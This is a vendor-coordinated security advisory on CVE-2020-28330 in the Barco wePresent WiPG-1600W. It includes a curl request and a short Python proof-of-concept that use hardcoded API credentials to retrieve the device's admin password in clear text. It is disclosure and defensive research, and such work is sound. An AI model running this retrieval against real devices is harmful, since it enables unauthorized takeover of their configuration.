Skip to main content
Security Advisory

Barco wePresent Admin Credentials Exposed In Plain-text

Advisory ID
KL-001-2020-005
CVE ID
CVE-2020-28330
Published
2020-11-20
Vendor
Barco

Affected Systems

Product
wePresent WiPG-1600W
Version
2.5.1.8
Platform
Embedded Linux

Discovered By

Jim Becher (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Barco
Affected Product: wePresent WiPG-1600W
Affected Version: 2.5.1.8
Platform: Embedded Linux
CWE Classification: CWE-523: Unprotected Transport of Credentials
CVE ID: CVE-2020-28330

Vulnerability Description

An attacker armed with hardcoded API credentials from KL-001-2020-004 (CVE-2020-28329) can issue an authenticated query to display the admin password for the main web user interface listening on port 443/tcp.

Technical Description

An authenticated request using the hardcoded credentials in KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0 will display the current admin password in clear text. An attacker will now have the admin password on the device, and can use the web interface to make any configuration changes to the device using the web UI.

$ curl -k -u 'admin:[REDACTED]'
https://192.168.2.200:4001/w1.0 { "status": 200, "message":
"Get successful", "data": { "key": "/w1.0", "value": {
            "ClientAccess":{
                "EnableAirplay": true
            }, "Configuration":{
                "RestartSystem": false, "ShutdownSystem": false,
                "SetAction": "NoAction", "SetActionUrl": ""
            }, "DeviceInfo":{
		     "ArticleNumber": "Barco_Number",
		     "CurrentUptime": 58524, "InUse": false,
		     "ModelName": "WiPG-1600", "Sharing": false,
		     "Status": 0, "StatusMessage": "", "TotalUptime":
		     473871262, "TotalUsers": 0, "LoginCodeOption":
		     "Random", "LoginCode": "3746", "SystemPassword":
		     "W3Pr3s3nt",	      <- Admin password
...  ...

Mitigation and Remediation Recommendation

The vendor has released an updated firmware (2.5.3.12) which remediates the described vulnerability. Firmware and release notes are available at:

https://www.barco.com/en/support/software/R33050104

Credit

This vulnerability was discovered by Jim Becher (@jimbecher) of KoreLogic, Inc.

Proof of Concept

The following is a basic Python function to return the admin password:

def get_admin_pw(host, port, adminpw):
    apiuser = "admin"
    apipw = "[REDACTED]"
    url = "https://" + host + ":" + port + "/w1.0"
    response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)
    dict = response.json()
    adminpw = dict['data']['value']['DeviceInfo']['SystemPassword']
    return adminpw

The contents of this advisory are copyright(c) 2020 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Disclosure Timeline

KoreLogic submits vulnerability details to Barco.

Barco acknowledges receipt and the intention to investigate.

Barco notifies KoreLogic that this issue, along with several others reported by KoreLogic, will require more than the standard 45 business day remediation timeline. Barco requests to delay coordinated disclosure until 2020.12.11.

KoreLogic agrees to 2020.12.11 coordinated disclosure.

Barco informs KoreLogic of their intent to acquire CVE number for this vulnerability.

Barco shares CVE number with KoreLogic and announces their intention to release the updated firmware ahead of schedule, on 2020.11.11. Request that KoreLogic delay public disclosure until 2020.11.20.

Barco firmware release.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt